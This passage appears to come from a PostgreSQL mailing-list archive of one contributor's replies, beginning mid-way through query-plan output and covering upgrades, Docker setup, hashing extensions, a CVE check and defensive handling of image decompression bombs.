> (cost=0.42..8.43 rows=1 width=16) (act
> ual time=48.475..48.475 rows=0 loops=1)
>  Index Cond: ((symbol)::text = 'MSFT'::text)
>  Buffers: shared read=3
>->  Index Scan using quotes_5_symbol_chunk_id_idx1 on quotes_5
> (cost=0.42..8.44 rows=1 width=16) (act
> ual time=45.995..45.995 rows=0 loops=1)
>  Index Cond: ((symbol)::text = 'MSFT'::text)
>  Buffers: shared read=3
>->  Index Scan using quotes_6_symbol_chunk_id_idx1 on quotes_6
> (cost=0.42..8.44 rows=1 width=16) (act
> ual time=23.474..23.474 rows=0 loops=1)
>  Index Cond: ((symbol)::text = 'MSFT'::text)
>  Buffers: shared read=3
>->  Index Scan using quotes_7_symbol_chunk_id_idx1 on quotes_7
> (cost=0.42..8.44 rows=1 width=16) (act
> ual time=67.030..67.030 rows=0 loops=1)
>  Index Cond: ((symbol)::text = 'MSFT'::text)
>  Buffers: shared read=3
>->  Index Scan using quotes_8_symbol_chunk_id_idx1 on quotes_8
> (cost=0.42..8.44 rows=1 width=16) (act
> ual time=16.230..16.230 rows=0 loops=1)
>  Index Cond: ((symbol)::text = 'MSFT'::text)
>  Buffers: shared read=3
>->  Index Scan using quotes_9_symbol_chunk_id_idx1 on quotes_9
> (cost=0.42..8.44 rows=1 width=16) (act
> ual time=24.758..24.758 rows=0 loops=1)
>  Index Cond: ((symbol)::text = 'MSFT'::text)
>  Buffers: shared read=3
>->  Index Scan using quotes_10_symbol_chunk_id_idx1 on quotes_10
> (cost=0.42..8.44 rows=1 width=16) (a
> ctual time=89.762..89.762 rows=0 loops=1)
>  Index Cond: ((symbol)::text = 'MSFT'::text)
>  Buffers: shared read=3
>->  Index Scan using quotes_11_symbol_chunk_id_idx1 on quotes_11
> (cost=0.42..8.44 rows=1 width=16) (a
> ctual time=54.779..54.779 rows=0 loops=1)
>  Index Cond: ((symbol)::text = 'MSFT'::text)
>  Buffers: shared read=3
>->  Index Scan using quotes_12_symbol_chunk_id_idx1 on quotes_12
> (cost=0.42..8.44 rows=1 width=16) (a
> ctual time=19.391..19.391 rows=0 loops=1)
>  Index Cond: ((symbol)::text = 'MSFT'::text)
>  Buffers: shared read=4
>->  Index Scan using quotes_13_symbol_chun

Re: 1 Status of vertical clustered index - 2 Join using (fk_constraint) suggestion - 3 Status of pgsql's parser autonomization

2020-02-16 Thread Imre Samu
>  3. What is the status of making the internal parser of PostgreSQL less
coupled to the core, and easier to cherry-pick from outside?

imho:
One of the current solutions is the https://github.com/lfittl/libpg_query
C library:

"C library for accessing the PostgreSQL parser outside of the server.

This library uses the actual PostgreSQL server source to parse SQL queries
and return the internal PostgreSQL parse tree. Note that this is mostly
intended as a base library for

-  pg_query  (Ruby),
-  pg_query.go  (Go),
-  pg-query-parser  (Node),
-  psqlparse  (Python) and
-  pglast  (Python 3)."

Best,
 Imre



maxzor  ezt írta (időpont: 2020. febr. 16., V, 22:38):

> Hello,
>
> 1. I was told that M$ SQLServer provides huge performance deltas over
> PostgreSQL when dealing with index-unaligned queries :
> create index i on t (a,b, c);
> select * from t where b=... and c=...;
> Columnar storage has been tried by various companies, CitusData,
> EnterpriseDB, 2ndQuadrant, Fujitsu Enterprise Postgres. It has been
> discussed quite a lot, last thread that I was able to find being in 2017,
> https://www.postgresql.org/message-id/CAJrrPGfaC7WC9NK6PTTy6YN-NN%2BhCy8xOLAh2doYhVg5d6HsAA%40mail.gmail.com
> where Fujitsu's patch made it quite far.
> What is the status on such a storage manager extension interface ?
>
> 2. What do you think of adding a new syntax : 'from t join t2 using
> (fk_constraint)' ? And further graph algorithms to make automatic joins ?
> Both 'natural join' and 'using (column_name)' are useless when the
> columns are not the same in source and destination.
> Plus it is often the case that the fk_constraints are over numerous
> columns, even though this is usually advised against. But when this case
> happens there will be a significant writing speedup.
> I have been bothered by this to the point that I developed a
> graphical-query-builder plugin for pgModeler,
>
> https://github.com/maxzor/plugins/tree/master/graphicalquerybuilder#automatic-join-mode
> ,
> but I believe such a syntax would be much better in the core!
>
> 3. What is the status of making the internal parser of PostgreSQL less
> coupled to the core, and easier to cherry-pick from outside?
> It would be great to incorporate it into companion projects : pgAdmin4,
> pgModeler, pgFormatter...
>
> BR, Maxime Chambonnet
>


Re: easy way to acquire height / width from images (PNG, JPEG) stored as bytea?

2020-04-17 Thread Imre Samu
> it killed my 200+ days uptime FreeBSD box :( .
> As I describe above, those attachments are nowhere as files.
> They are email attachments. Also we got about half TB of them.

Is it possible that some image is a "decompression bomb"?

"Because of the efficient compression method used in Portable Network
Graphics (PNG) files, a small PNG file can expand tremendously, acting as a
"decompression bomb". Malformed PNG chunks can consume a large amount of
CPU and wall-clock time and large amounts of memory, up to all memory
available on a system, causing a Denial of Service (DoS). Libpng-1.4.1 has
been revised to use less CPU time and memory, and provides functions that
applications can use to further defend against such files."
https://libpng.sourceforge.io/decompression_bombs.html
https://stackoverflow.com/questions/33602308/how-to-check-png-file-if-its-a-decompression-bomb
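
If you end up extracting width/height in Python (e.g. from a plpython3u
function), a minimal defensive sketch with Pillow - the pixel limit is just
an example value to tune:

  from io import BytesIO
  from PIL import Image

  # Pillow warns above this declared pixel count and raises
  # DecompressionBombError when it is exceeded by a large factor
  Image.MAX_IMAGE_PIXELS = 50_000_000

  def image_size(blob: bytes):
      """Return (width, height) of an image stored as bytea, or None."""
      try:
          with Image.open(BytesIO(blob)) as img:
              return img.width, img.height
      except (Image.DecompressionBombError, OSError):
          return None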

Regards,
 Imre


Achilleas Mantzios  ezt írta (időpont: 2020.
ápr. 17., P, 16:39):

> On 17/4/20 4:09 μ.μ., Adam Brusselback wrote:
>
> Why not extract and store that metadata with the image rather than trying
> to extract it to filter on at query time? That way you can index your
> height and width columns to speed up that filtering if necessary.
>
> Yes I thought of that, but those are coming automatically from our mail
> server (via synonym), we have written an alias : a program that parses and
> stores emails. This is generic, I wouldn't like to add specific code (or
> specific columns)  just for image attachments. However I dig the idea of
> the indexes.
>
> You may be able to write a wrapper for a command line tool like imagemagic
> or something so you can call that from a function to determine the size if
> you did want to stick with extracting that at query time.
>
> As I describe above, those attachments are nowhere as files. They are
> email attachments. Also we got about half TB of them.
>


Re: TPC-H

2018-07-15 Thread Imre Samu
> Is there a table definition script available that is widely used for
TPC-H in Postgresql to get results that can be compared?

There are multiple "PostgreSQL + TPC-H" projects on GitHub -
maybe you can reuse some ideas from them:
https://github.com/search?q=%22TPC-H%22+postgresql&type=Repositories

regards,
Imre


Malte Vesper  ezt írta (időpont: 2018. júl. 15., V,
15:31):

> Hello,
> I am trying to run TPC-H on PostgreSQL. While I was able to create the
> tables and run the queries, I am wondering if there is a table definition
> forTPC-H and PostgreSQL that is generally used, as far as I understand the
> TPC-H user can choose to create indices or preprocess data in individual
> tablesto quite an extent (i.e. CLUSTER seems allowed), leading to
> unexpected/very different results depending on the table definition (i.e.
> https://www.postgresql.org/message-id/CAKJS1f-erAogxxd=4tr2rlukoy5m-or+djyzr2rbmanz35t...@mail.gmail.com
> ).
>
> Is there a table definition script available that is widely used for TPC-H
> in Postgresql to get results that can be compared?
>
> Kind regards,
> Malte Vesper
>
>


Re: Error while upgrading from v12 to v13

2022-10-29 Thread Imre Samu
> ERROR:  could not find function "pl_profiler_enable" in file

maybe obsolete function?

-- Drop obsolete function
DROP FUNCTION pl_profiler_enable(bool);
https://github.com/bigsql/plprofiler/blob/master/plprofiler--3.5--4.0.sql

Regards,
 Imre

shashidhar Reddy  ezt írta (időpont: 2022.
okt. 29., Szo, 13:40):

>
> I am getting below error while upgrading postgres from version 12 to 13
> and not sure how to enable the function before upgrading the cluster. Can
> you please help me to resolve this.
>
>  error: could not execute query: ERROR:  could not find function
> "pl_profiler_enable" in file
> "/usr/lib/postgresql/13/lib/plprofiler.so"
> Command was: CREATE FUNCTION "public"."pl_profiler_enable"("enabled"
> boolean) RETURNS boolean
> LANGUAGE "c"
> AS '$libdir/plprofiler', 'pl_profiler_enable';
> Shashidhar
>


Re: Information to CVE-2022-42889

2022-11-08 Thread Imre Samu
> if the above product is affected by the CVE

You will find the "Known PostgreSQL Security Vulnerabilities in Supported
Versions"
here: https://www.postgresql.org/support/security/

For the PostgreSQL JDBC Driver:
please check https://jdbc.postgresql.org/security/
or the fixed CVE lists:
https://github.com/pgjdbc/pgjdbc/issues?q=CVE+sort%3Aupdated-desc
or https://github.com/pgjdbc/pgjdbc/security/advisories ( Security
Advisories )

Based on
https://www.docker.com/blog/security-advisory-cve-2022-42889-text4shell/
you have to search for "commons-text-1.9.jar" ( commons-text-*.* ) on
the servers and the clients.
The PostgreSQL ecosystem is huge (e.g. a driver, an extension, or an
installer), so you have to check any Java-related software.
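
A minimal sketch of such a search on a Linux host - the starting path is an
example, adjust it to where your Java software lives:

  find / -xdev -name 'commons-text-*.jar' 2>/dev/null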

Anyway, it's a good time to install the latest patch version of everything
( latest PostgreSQL JDBC Driver, or latest Postgres minor version; see:
https://www.postgresql.org/support/versioning/ ).
The next minor release is expected on November 10th, 2022 ( see
https://www.postgresql.org/developer/roadmap/ ):
"The PostgreSQL Project releases security fixes as part of minor version
updates. You are always advised to use the latest minor version available,
as it will contain other non-security related fixes."

You will find professional services here:
https://www.postgresql.org/support/professional_support/

Regards,
 Imre
 ( Disclaimer: I am just a Postgres user and not a security expert! )


Cedric Aaron Towstyka  ezt írta
(időpont: 2022. nov. 8., K, 12:10):

> Hello dear PostgreSQL Server Team,
>
> the german bureau for IT-Security "BSI" (Bundesamt für Sicherheit in der
> Informationstechnik) has issued a warning for CVE CVE-2022-42889 with the
> name commons-text. Insurance companies are obliged to analyse the
> installed software for vulnerabilities of this type.
> As the Barmenia is using your product PostgreSQL Server it is necessary to
> obtain all information regarding any vulnerability against above CVE.
>
> We kindly ask you to provide information if the above product is affected
> by the CVE and if yes, when a fix will be available.
>
>
>
> With the request for short-term feedback.
>
> Kind Regards.
>
>
>
> Cedric Aaron Towstyka
>
> Databaseadministrator
>
>
>
> Barmenia Krankenversicherung a. G.
>
> Barmenia Allgemeine Versicherungs-AG
>
> Barmenia Lebensversicherung a. G.
>
> Barmenia-Allee 1
>
> 42119 Wuppertal
>
>
>
> +49 202 438 2964
>
>
>
> 
> - facebook.de/barmenia  -
> xing.de/companies/barmenia
>  -
> twitter.com/barmenia - youtube.de/barmenia
> 
>
> Barmenia Allgemeine Versicherungs-AG
> Vorstand: Dr. Andreas Eurich (Vorsitzender) - Frank Lamsfuß - Ulrich Lamy
> - Carola Schroeder
> Aufsichtsrats-Vorsitzender: Dr. h. c. Josef Beutelmann; Rechtsform des
> Unternehmens: Aktiengesellschaft
> Sitz: Wuppertal; Amtsgericht Wuppertal HRB 3033;
> USt.-Identifikationsnummer: DE 811425914; Versicherungsteuernummer:
> 810/V90810006337
>
> Barmenia Krankenversicherung AG
> Vorstand: Dr. Andreas Eurich (Vorsitzender) - Frank Lamsfuß - Ulrich Lamy
> - Carola Schroeder
> Aufsichtsrats-Vorsitzender: Dr. h. c. Josef Beutelmann; Rechtsform des
> Unternehmens: Aktiengesellschaft
> Sitz: Wuppertal; Amtsgericht Wuppertal HRB 28475;
> USt.-Identifikationsnummer: DE 121102508
>
> Barmenia Lebensversicherung a. G.
> Vorstand: Dr. Andreas Eurich (Vorsitzender) - Frank Lamsfuß - Ulrich Lamy
> - Carola Schroeder
> Aufsichtsrats-Vorsitzender: Dr. h. c. Josef Beutelmann; Rechtsform des
> Unternehmens: Versicherungsverein auf Gegenseitigkeit
> Sitz: Wuppertal; Amtsgericht Wuppertal HRB 3854;
> USt.-Identifikationsnummer: DE 121102516
>
>
>


PostgreSQL Mailing list public archives : search not working ...

2023-04-06 Thread Imre Samu
Hi,

Theory: Maybe the search doesn't always work ...
Is this a known problem?

My use case:
in https://www.postgresql.org/list/  ->  "Search the Archives"
search for the "large database backup"
->
https://www.postgresql.org/search/?m=1&q=large+database+backup&l=&d=365&s=r
-> "Your search for large database backup returned no hits."

But at least one big thread exists:

To: pgsql-general 
Subject: postgres *large database backup*
Date: 2022-11-30 15:40:23
https://www.postgresql.org/message-id/flat/CA%2BONtZ7CdiJ2X8x_8sPHR%2Btz-vv7mR1uoDzLia3fzWVZA9k0JQ%40mail.gmail.com


*Changing the "Sort by" ..*

- sort by: rank: no hits
https://www.postgresql.org/search/?m=1&q=large+database+backup&l=&d=365&s=r

- sort by: date:  OK ; 1 result
https://www.postgresql.org/search/?m=1&q=large+database+backup&l=&d=365&s=d

- sort by: reverse date : no hits.
https://www.postgresql.org/search/?m=1&q=large+database+backup&l=&d=365&s=i

Regards,
 Imre


Re: murmur3 hash binary data migration from Oracle to PostgreSQL

2023-04-25 Thread Imre Samu
>
> No we want to generate murmur3 format only.
>

If you need a server-side murmur3 function
-  one alternative is the https://github.com/markokr/pghashlib extension.

psql (15.2 (Debian 15.2-2))
Type "help" for help.

db=# create extension hashlib;
CREATE EXTENSION

db=#
select hash_string('', 'murmur3');
select hash_string('a', 'murmur3');
select hash_string('abcdefg', 'murmur3');
select encode(hash128_string('abcdefg', 'murmur3'), 'hex');
+-------------+
| hash_string |
+-------------+
|           0 |
+-------------+
(1 row)

+-------------+
| hash_string |
+-------------+
|  1009084850 |
+-------------+
(1 row)

+-------------+
| hash_string |
+-------------+
| -2009294074 |
+-------------+
(1 row)

+----------+
|  encode  |
+----------+
| 069b3c88 |
+----------+
(1 row)


In my test, I have used this fork:
https://github.com/bgdevlab/pghashlib/tree/bgdevlab/builds

RUN mkdir -p /pghashlib \
 && git clone --depth 1 --branch bgdevlab/builds \
      https://github.com/bgdevlab/pghashlib.git /pghashlib \
 && cd /pghashlib \
 && make USE_PGXS=1 \
 && make USE_PGXS=1 install \
 && rm -rf /pghashlib

Regards,
 Imre


Re: running ANALYZE results in => duplicate key value violates unique constraint "pg_statistic_relid_att_inh_index"

2023-09-06 Thread Imre Samu
> But how is that corruption happening - I mean it is a docker image,
> freshly fetched from the registry.

Hi Torsten,

Maybe you have to increase the "--stop-timeout" value ( or "stop_grace_period"
in docker-compose ):
https://github.com/docker-library/postgres/issues/544#issuecomment-455738848

docker run: " --stop-timeout  Timeout (in seconds) to stop a container "
https://docs.docker.com/engine/reference/commandline/run/
or
https://docs.docker.com/compose/compose-file/compose-file-v3/#stop_grace_period

And recommended in the Dockerfile:
https://github.com/docker-library/postgres/blob/master/Dockerfile-debian.template#L208

STOPSIGNAL SIGINT
#
# An additional setting that is recommended for all users regardless of this
# value is the runtime "--stop-timeout" (or your orchestrator/runtime's
# equivalent) for controlling how long to wait between sending the defined
# STOPSIGNAL and sending SIGKILL (which is likely to cause data corruption).
#
# The default in most runtimes (such as Docker) is 10 seconds, and the
# documentation at https://www.postgresql.org/docs/12/server-start.html notes
# that even 90 seconds may not be long enough in many instances.
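
A minimal docker-compose sketch of the same recommendation - the service
name, image tag and the 120s value are only examples:

  services:
    db:
      image: postgres:15
      stop_grace_period: 120s
      environment:
        POSTGRES_PASSWORD: example

( the equivalent for plain docker is:  docker run --stop-timeout 120 ... )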

regards,
 Imre


Torsten Krah  ezt írta (időpont: 2023. szept. 6., Sze,
14:45):

> Am Mittwoch, dem 06.09.2023 um 10:21 +0200 schrieb Laurenz Albe:
> > You are lucky that the corrupted table is one that holds data that
> > can be rebuilt.
>
> It is a test instance / container anyway which is deleted afterwards
> and can be setup again as often as I want.
>
> But how is that corruption happening - I mean it is a docker image,
> freshly fetched from the registry.
>
> After that I am starting a container from that image, (re)importing
> data (different tests => different data so the cycle of delete data /
> import data / analyze the data happens quite often) and running my
> tests.
> The OS does not report anything which would relate nor does any other
> tool / system fail nor does postgresl itself fail on any other table
> here - it always fails only on that analyze part.
>
> That happens all in about 8-10 minutes for the whole process - what is
> causing that corruption in that short timeframe here?
>
> regards
>
> Torsten
>
>
>
>


Re: Changed functionality from 14.3 to 15.3

2023-09-20 Thread Imre Samu
Michael Corey  ezt írta (időpont: 2023.
szept. 20., Sze, 20:48):

> ... All of the DDL is just the setup for the test case.  I ran those steps
> in both databases to setup the exact same environment.  The COMMIT is not
> needed for the test out of habit I put it in my setup.  The main issue is
> in 14.3 I can run this select as user sten_schema, but in 15.3 I am unable
> due to a permission issue.
>

Hi Michael,

I couldn't reproduce the outcome you observed in PG14.3 using the
"postgres:14.3" (debian) Docker image.

My minimal docker test:

docker pull postgres:14.3
docker run --name pg143tx -e POSTGRES_DB=db14 -e POSTGRES_USER=postgres -e
POSTGRES_PASSWORD=pw9 -d postgres:14.3
docker exec -ti pg143tx psql -d db14 -U postgres

My log:

psql (14.3 (Debian 14.3-1.pgdg110+1))
Type "help" for help.

  < copy paste your test code > 

CREATE ROLE
ERROR:  role "rds_superuser" does not exist
CREATE ROLE
CREATE ROLE
CREATE ROLE
CREATE ROLE
CREATE ROLE
ALTER ROLE
ALTER ROLE
GRANT ROLE
CREATE ROLE
ALTER ROLE
ALTER ROLE
GRANT ROLE
CREATE SCHEMA
ALTER SCHEMA
GRANT
GRANT
GRANT
GRANT
CREATE TABLE
ALTER TABLE
GRANT
GRANT
GRANT
INSERT 0 1
INSERT 0 1
INSERT 0 1
WARNING:  there is no transaction in progress
COMMIT
CREATE SCHEMA
ALTER SCHEMA
GRANT
GRANT
GRANT
GRANT
CREATE VIEW
ALTER TABLE
GRANT
GRANT
db14=# \c db14 sten_schema
You are now connected to database "db14" as user "sten_schema".
db14=> select * from sten_media_codes_view ;
ERROR:  permission denied for table ref_media_code
db14=>  select * from ref_media_code ;
ERROR:  permission denied for table ref_media_code

db14=> SELECT version();
                                 version
---------------------------------------------------------------------------
 PostgreSQL 14.3 (Debian 14.3-1.pgdg110+1) on x86_64-pc-linux-gnu, compiled
by gcc (Debian 10.2.1-6) 10.2.1 20210110, 64-bit
(1 row)

Regards,
  Imre


Re: Question regarding the new SQL standard

2023-10-26 Thread Imre Samu
Anders Kildemand  ezt írta (időpont: 2023. okt. 26., Cs,
14:38):

> What's the situation with Property Graph Queries in Postgres?
>

If the underlying question is how to utilize graph database functionality
in PostgreSQL, there are similar extensions that may be worth exploring:
- Apache AGE is a PostgreSQL extension that provides graph database
functionality.  https://age.apache.org/
- AgensGraph is a transactional graph database based on PostgreSQL.
https://github.com/bitnine-oss/agensgraph
- etc.

Related : https://www.dylanpaulus.com/posts/postgres-is-a-graph-database/
(  https://news.ycombinator.com/item?id=35386948 )
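
A minimal sketch of what the Apache AGE flavour looks like - the graph name,
label and property are arbitrary examples, and the setup steps may differ
between AGE versions:

  CREATE EXTENSION age;
  LOAD 'age';
  SET search_path = ag_catalog, "$user", public;

  SELECT create_graph('demo');

  -- create a vertex ...
  SELECT * FROM cypher('demo', $$
      CREATE (:Person {name: 'Ada'})
  $$) AS (v agtype);

  -- ... and query it back with openCypher
  SELECT * FROM cypher('demo', $$
      MATCH (p:Person) RETURN p.name
  $$) AS (name agtype);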

Best regards,
  Imre


Re: postgresql-10 armhf repository

2018-08-23 Thread Imre Samu
> Is there any other repository with the last version of postgresql-10
armhf packages ?

Postgres Docker images (Alpine based):
- arm32v5:   https://hub.docker.com/r/arm32v5/postgres/
- arm32v6:   https://hub.docker.com/r/arm32v6/postgres/   (for Raspberry Pi 1)
- arm32v7:   https://hub.docker.com/r/arm32v7/postgres/   (for Raspberry Pi 2, Allwinner A10, A20, H3)
- arm64v8:   https://hub.docker.com/r/arm64v8/postgres/
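
A minimal sketch of running one of them on a Raspberry Pi 2/3 - the tag,
container name, password and data path are only examples (check the
available tags on the Docker Hub page):

  docker run -d --name pg10 \
      -e POSTGRES_PASSWORD=mysecret \
      -v /srv/pgdata:/var/lib/postgresql/data \
      -p 5432:5432 \
      arm32v7/postgres:10-alpine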

Imre

Grégoire Berclaz  ezt írta (időpont: 2018.
aug. 23., Cs, 10:43):

> Hello,
>
> I would like to install postgresql-10 on raspberries. I followed this
> instructions : https://wiki.postgresql.org/wiki/Apt
>
> Unfortunatly after a "sudo apt-get update" I get the error :
> " Skipping acquire of configured file 'main/binary-armhf/Packages' as
> repository 'http://apt.postgresql.org/pub/repos/apt stretch-pgdg
> InRelease' doesn't support architecture 'armhf' "
>
> The problem is that there is no armhf directory on the official repository
> https://apt.postgresql.org/pub/repos/apt/dists/stretch-pgdg/main/
>
> So, I have two questions :
>
>- Why postgresql.org doesn't have this package on the repository ?
>- Is there any other repository with the last version of postgresql-10
>armhf packages ?
>
>
> Regards,
> Greg
>


Re: Performance comparison between Pgsql 10.5 and Pgsql 11.2

2019-03-04 Thread Imre Samu
> is there any reason why I am getting worse results using pgsql11.2 in
writing comparing it with pgsql 10.6?
>... And Yes both are compiled.

Why 10.6?

According to the release notes
"14th February 2019: PostgreSQL 11.2, 10.7, 9.6.12, 9.5.16, and 9.4.21
Released!"  https://www.postgresql.org/about/news/1920/
imho: it would be better to compare PG11.2 with PG10.7 ( similar bug
fixes and improvements + same fsync() behavior ):

"This release changes the behavior in how PostgreSQL interfaces with
fsync() and includes fixes for partitioning and over 70 other bugs that
were reported over the past three months"

Imre



Nicola Contu  ezt írta (időpont: 2019. márc. 4., H,
13:14):

> I did a analyze in stages on both.
> And Yes both are compiled.
> This is the configure command (change 10.6 for PG10)
>
> ./configure --prefix=/usr/local/pgsql11.2
>
> See attached perf report. The difference seems to be all in this line, but
> not sure :
>
> +   26.80% 0.00%   222  postmaster   [kernel.kallsyms]
> [k] system_call_fastpath
>
>
>
> I am using CentOS 7
> With Centos I am using this profile for tuned-adm
> [root@STAGING-CMD1 ~]#  tuned-adm active
> Current active profile: latency-performance
>
>
> Il giorno sab 2 mar 2019 alle ore 20:41 Thomas Munro <
> thomas.mu...@gmail.com> ha scritto:
>
>> On Sat, Mar 2, 2019 at 5:02 AM Ray O'Donnell  wrote:
>> > On 01/03/2019 15:01, Nicola Contu wrote:
>> > > Hello,
>> > > is there any reason why I am getting worse results using pgsql11.2 in
>> > > writing comparing it with pgsql 10.6?
>> > >
>> > > I have two Instances, both just restored, so no bloats.
>> > > Running read queries I have pretty much same results, a little bit
>> > > better on pg11- Running writes the difference is in favour of 10.
>> >
>> > Did you run ANALYZE on the databases after restoring?
>>
>> If you can rule out different query plans, and if you compiled them
>> both with the same compiler and optimisation levels and without
>> cassert enabled (it's a long shot but I mentioned that because you
>> showed a path in /usr/local so perhaps you're hand-compiling 11, but
>> 10 came from a package?), then the next step might be to use a
>> profiler like "perf" (or something equivalent on your OS) to figure
>> out where 11 is spending more time in the write test?
>>
>> --
>> Thomas Munro
>> https://enterprisedb.com
>>
>


Re: Postgres Database Hacked

2019-05-08 Thread Imre Samu
> I am working on postgres database version 9.3
> ...and now my running database become hacked by someone.

imho:
Version 9.3 is End of Life (EoL);
final release: 9.3.25 (November 8, 2018)
https://www.postgresql.org/support/versioning/

Please upgrade to a newer version ( with the latest security fixes ).

Best,
Imre


Prashant Hunnure  ezt írta (időpont: 2019.
máj. 8., Sze, 12:50):

> Dear Team,
>
> I am working on postgres database version 9.3 is the part of opengeo suite
> and now my running database become hacked by someone. In the current
> situation I'm able to view my database under Pgadmin III but unable to view
> the tables, functions and other attributes on windows environment.
>
> Your valuable solution / suggestions are highly appreciated.
>
> Thanks and Regards,
> Prashant Hunnure
> Database Architect
> S2 Infotech International Limited,Mumbai.
>
>